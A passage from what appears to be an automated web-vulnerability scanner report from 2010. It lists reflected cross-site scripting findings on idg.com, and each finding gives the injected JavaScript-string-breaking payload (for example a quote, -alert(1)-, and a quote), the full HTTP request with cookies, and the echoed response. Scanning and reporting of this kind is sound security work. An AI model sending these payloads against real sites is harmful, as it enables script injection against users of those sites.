Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5047
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.jsc119d";e19dc6781a0?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.216. http://idg.com/www/homenew.nsf/public_smo_scripts.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ca8"-alert(1)-"85e454a4e95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/public_smo_scripts.js?f4ca8"-alert(1)-"85e454a4e95=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5038
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.js?f4ca8"-alert(1)-"85e454a4e95=1");
} catch(err) {}</script>
...[SNIP]...

2.217. http://idg.com/www/homenew.nsf/request.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfaa1"-alert(1)-"205fabb7143 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/request.js?OpenJavascriptLibrarybfaa1"-alert(1)-"205fabb7143 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5046
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js?OpenJavascriptLibrarybfaa1"-alert(1)-"205fabb7143");
} catch(err) {}</script>
...[SNIP]...

2.218. http://idg.com/www/homenew.nsf/request.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ce5"%3b380f1fa090 was submitted in the REST URL parameter 1. This input was echoed as f4ce5";380f1fa090 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwf4ce5"%3b380f1fa090/homenew.nsf/request.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5035
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwf4ce5";380f1fa090/homenew.nsf/request.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.219. http://idg.com/www/homenew.nsf/request.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88126"%3bbb2e45fb221 was submitted in the REST URL parameter 3. This input was echoed as 88126";bb2e45fb221 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/request.js88126"%3bbb2e45fb221?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:28 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5036
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js88126";bb2e45fb221?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.220. http://idg.com/www/homenew.nsf/request.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9da4"-alert(1)-"4abb3a2a387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/request.js?a9da4"-alert(1)-"4abb3a2a387=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js?a9da4"-alert(1)-"4abb3a2a387=1");
} catch(err) {}</script>
...[SNIP]...

2.221. http://idg.com/www/homenew.nsf/screen2.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/screen2.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2b5c"%3b82c384e1acd was submitted in the REST URL parameter 1. This input was echoed as a2b5c";82c384e1acd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwa2b5c"%3b82c384e1acd/homenew.nsf/screen2.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwa2b5c";82c384e1acd/homenew.nsf/screen2.css");
} catch(err) {}</script>
...[SNIP]...

2.222. http://idg.com/www/homenew.nsf/screen2.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/screen2.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4760c"%3b8023bed7ea3 was submitted in the REST URL parameter 3. This input was echoed as 4760c";8023bed7ea3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/screen2.css4760c"%3b8023bed7ea3 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/screen2.css4760c";8023bed7ea3");
} catch(err) {}</script>
...[SNIP]...

2.223. http://idg.com/www/homenew.nsf/screen2.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/screen2.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2632b"-alert(1)-"260996669dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/screen2.css?2632b"-alert(1)-"260996669dd=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/screen2.css?2632b"-alert(1)-"260996669dd=1");
} catch(err) {}</script>
...[SNIP]...

2.224. http://idg.com/www/homenew.nsf/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc914"%3bfa7c65a210d was submitted in the REST URL parameter 1. This input was echoed as fc914";fa7c65a210d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwfc914"%3bfa7c65a210d/homenew.nsf/style.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5013
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwfc914";fa7c65a210d/homenew.nsf/style.css");
} catch(err) {}</script>
...[SNIP]...

2.225. http://idg.com/www/homenew.nsf/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9916"%3b0b3e1cac903 was submitted in the REST URL parameter 3. This input was echoed as f9916";0b3e1cac903 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/style.cssf9916"%3b0b3e1cac903 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:28 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5013
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/style.cssf9916";0b3e1cac903");
} catch(err) {}</script>
...[SNIP]...

2.226. http://idg.com/www/homenew.nsf/style.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65115"-alert(1)-"7b51d567050 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/style.css?65115"-alert(1)-"7b51d567050=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/style.css?65115"-alert(1)-"7b51d567050=1");
} catch(err) {}</script>
...[SNIP]...

2.227. http://idg.com/www/homenew.nsf/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65557"%3b483e735cb63 was submitted in the REST URL parameter 1. This input was echoed as 65557";483e735cb63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www65557"%3b483e735cb63/homenew.nsf/swfobject.js HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www65557";483e735cb63/homenew.nsf/swfobject.js");
} catch(err) {}</script>
...[SNIP]...

2.228. http://idg.com/www/homenew.nsf/swfobject.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f344"%3b7bb8563c282 was submitted in the REST URL parameter 3. This input was echoed as 2f344";7bb8563c282 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/swfobject.js2f344"%3b7bb8563c282 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/swfobject.js2f344";7bb8563c282");
} catch(err) {}</script>
...[SNIP]...

2.229. http://idg.com/www/homenew.nsf/swfobject.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/swfobject.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0de4"-alert(1)-"fcc60ddb84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/swfobject.js?a0de4"-alert(1)-"fcc60ddb84=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
